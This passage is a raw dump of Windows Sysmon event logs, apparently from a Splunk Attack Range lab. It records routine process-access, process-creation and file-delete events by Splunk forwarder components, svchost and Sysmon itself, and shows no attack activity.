AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000016931Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.456{E5A8D418-E4C4-63C7-0E02-00000000B002}26483432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016930Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.288{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3975BE3CA03443BC0F97EBFD29A4050,SHA256=F46FF2DCC427C7D68A95692B300CE09590BE505831FDF584FDEA6B17DADA2976,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000016929Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.288{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E4C4-63C7-0E02-00000000B002}2648C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016928Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.288{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016927Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.288{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016926Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.288{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016925Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.288{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016924Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.288{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016923Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.288{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016922Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.288{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016921Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.288{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016920Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.288{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016919Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.288{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E4C4-63C7-0E02-00000000B002}2648C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016918Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.288{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E4C4-63C7-0E02-00000000B002}2648C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016917Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.288{E5A8D418-E4C4-63C7-0E02-00000000B002}2648C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000044165Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:32.529{FE4C2B44-E4C4-63C7-5506-00000000AF02}35167152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044164Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:32.382{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E4C4-63C7-5506-00000000AF02}3516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044163Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:32.378{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044162Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:32.378{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044161Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:32.378{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044160Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:32.378{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044159Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:32.378{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E4C4-63C7-5506-00000000AF02}3516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044158Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:32.378{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E4C4-63C7-5506-00000000AF02}3516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044157Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:32.379{FE4C2B44-E4C4-63C7-5506-00000000AF02}3516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000044156Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:32.169{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 23542300x800000000000000044184Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.956{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85FD98F24EE69F00F1FD9C0C9CEB6E1A,SHA256=99EC4729C8F3F7528459304BB2922A91164BB216E2167E857A0F3B04AF1917EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016952Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:33.845{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96FAB1F10AB41D3D5F14F19922A83083,SHA256=31819EA85B8B305E418DDE2A2948F1E9D1B468DABF2C485A7E57210DCD5554E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044183Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.862{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E4C5-63C7-5706-00000000AF02}4656C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044182Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 